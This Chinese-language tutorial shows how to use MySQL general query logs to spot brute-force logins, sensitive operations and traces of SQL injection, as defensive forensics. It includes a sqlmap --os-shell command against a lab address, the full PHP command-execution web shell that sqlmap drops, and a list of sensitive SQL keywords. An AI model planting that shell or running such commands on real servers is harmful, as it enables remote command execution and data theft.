常見的數據庫攻擊包括弱口令、sql注入、提升權限、竊取備份等。對數據庫日志進行分析,可以發現攻擊行為,進一步還原攻擊場景及追溯攻擊源。
一、mysql日志分析
general query log能記錄成功連接和每次執行的查詢,我們可以將它用作安全布防的一部分,為故障分析或黑客事件后的調查提供依據。
1、查看log配置信息
show?variables?like?'%general%';
2、開啟日志
SET?GLOBAL?general_log?=?'On';
3、指定日志文件路徑
SET?GLOBAL?general_log_file?=?'/var/lib/mysql/mysql.log';
比如,當我訪問 /test.php?id=1,此時我們得到這樣的日志:
190604?14:46:14???????14?Connect????root@localhost?on ??????????????????????14?Init?DB????test??? ??????????????????????14?Query????select?*?FROM?admin?WHERE?id?=?1????? ??????????????????????14?Quit
我們按列來解析一下:
第一列:Time,時間列,前面一個是日期,后面一個是小時和分鐘,有一些不顯示的原因是因為這些sql語句幾乎是同時執行的,所以就不另外記錄時間了。
第二列:Id,就是show?processlist出來的第一列的線程ID,對于長連接和一些比較耗時的sql語句,你可以精確找出究竟是那一條那一個線程在運行。
第三列:Command,操作類型,比如Connect就是連接數據庫,Query就是查詢數據庫(增刪查改都顯示為查詢),可以特定過慮一些操作。
第四列:Argument,詳細信息,例如?Connect????root@localhost?on?意思就是連接數據庫,如此類推,接下面的連上數據庫之后,做了什么查詢的操作。
二、登錄成功/失敗
我們來做個簡單的測試吧,使用我以前自己開發的弱口令工具來掃一下,字典設置比較小,2個用戶,4個密碼,共8組。
MySQL中的log記錄是這樣子:
Time?????????????????Id????????Command?????????Argument 190601?22:03:20?????98?Connect??root@192.168.204.1?on ????????98?Connect??Access?denied?for?user?'root'@'192.168.204.1'?(using?password:?YES)?????? ????????103?Connect??mysql@192.168.204.1?on??????? ????????103?Connect??Access?denied?for?user?'mysql'@'192.168.204.1'?(using?password:?YES)?????? ????????104?Connect??mysql@192.168.204.1?on??????? ????????104?Connect??Access?denied?for?user?'mysql'@'192.168.204.1'?(using?password:?YES)?????? ????????100?Connect??root@192.168.204.1?on??????? ????????101?Connect??root@192.168.204.1?on??????? ????????101?Connect??Access?denied?for?user?'root'@'192.168.204.1'?(using?password:?YES)??????? ????????99?Connect??root@192.168.204.1?on???????? ????????99?Connect??Access?denied?for?user?'root'@'192.168.204.1'?(using?password:?YES)?????? ????????105?Connect??mysql@192.168.204.1?on??????? ????????105?Connect??Access?denied?for?user?'mysql'@'192.168.204.1'?(using?password:?YES)?????? ????????100?Query??set?autocommit=0?????? ????????102?Connect??mysql@192.168.204.1?on??????? ????????102?Connect??Access?denied?for?user?'mysql'@'192.168.204.1'?(using?password:?YES)?????? ????????100?Quit
你知道在這個口令猜解過程中,哪個是成功的嗎?
利用爆破工具,一個口令猜解成功的記錄是這樣子的:
190601?22:03:20?????100?Connectroot@192.168.204.1?on ???100?Queryset?autocommit=0??? ???100?Quit
但是,如果你是用其他方式,可能會有一點點不一樣的哦。
navicat for MySQL登錄:
190601?22:14:07??106?Connectroot@192.168.204.1?on????????? ?????????106?QuerySET?NAMES?utf8 ?????????106?QuerySHOW?VARIABLES?LIKE?'lower_case_%'????????? ?????????106?QuerySHOW?VARIABLES?LIKE?'profiling'????????? ?????????106?QuerySHOW?DATABASES
命令行登錄:
190601?22:17:25??111?Connectroot@localhost?on ?????????111?Queryselect?@@version_comment?limit?1 ?????????190601?22:17:56??111?Quit
這個差別在于,不同的數據庫連接工具,它在連接數據庫初始化的過程中是不同的。通過這樣的差別,我們可以簡單判斷出用戶是通過連接數據庫的方式。
另外,不管你是爆破工具、Navicat for MySQL、還是命令行,登錄失敗都是一樣的記錄。
登錄失敗的記錄:
102?Connect??mysql@192.168.204.1?on? 102?Connect??Access?denied?for?user?'mysql'@'192.168.204.1'?(using?password:?YES)
利用shell命令進行簡單的分析:
有哪些IP在爆破?
grep??"Access?denied"?mysql.log?|cut?-d?"'"?-f4|uniq?-c|sort?-nr ?????27?192.168.204.1
爆破用戶名字典都有哪些?
grep??"Access?denied"?mysql.log?|cut?-d?"'"?-f2|uniq?-c|sort?- nr?????13?mysql?????12?root??????1?root??????1?mysql
在日志分析中,特別需要注意一些敏感的操作行為,比如刪表、備庫,讀寫文件等。
關鍵詞:drop?table、drop?function、lock?tables、unlock?tables、load_file()?、into?outfile、into?dumpfile。
敏感數據庫表:SELECT?*?from?mysql.user、SELECT?*?from?mysql.func
三、SQL注入入侵痕跡
在利用SQL注入漏洞的過程中,我們會嘗試利用sqlmap的–os-shell參數取得shell,如操作不慎,可能留下一些sqlmap創建的臨時表和自定義函數。我們先來看一下sqlmap os-shell參數的用法以及原理:
1、構造一個SQL注入點,開啟Burp監聽8080端口
sqlmap.py??-u?http://192.168.204.164/sql.php?id=1?--os-shell?--proxy=http://127.0.0.1:8080
HTTP通訊過程如下:
創建了一個臨時文件tmpbwyov.php,通過訪問這個木馬執行系統命令,并返回到頁面展示。
tmpbwyov.php: <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function?f($n){global?$z;return?is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print?"<pre class="brush:php;toolbar:false">".$w."
“;?>`
創建了一個臨時表sqlmapoutput,調用存儲過程執行系統命令將數據寫入臨時表,然后取臨時表中的數據展示到前端。
通過查看網站目錄中最近新建的可疑文件,可以判斷是否發生過sql注入漏洞攻擊事件。
檢查方法:
1、檢查網站目錄下,是否存在一些木馬文件:
2、檢查是否有UDF提權、MOF提權痕跡
檢查目錄是否有異常文件
mysqllibpluginc:/windows/system32/wbem/mof/
檢查函數是否刪除
select?*?from?mysql.func
3、結合web日志分析。
推薦教程:web服務器安全
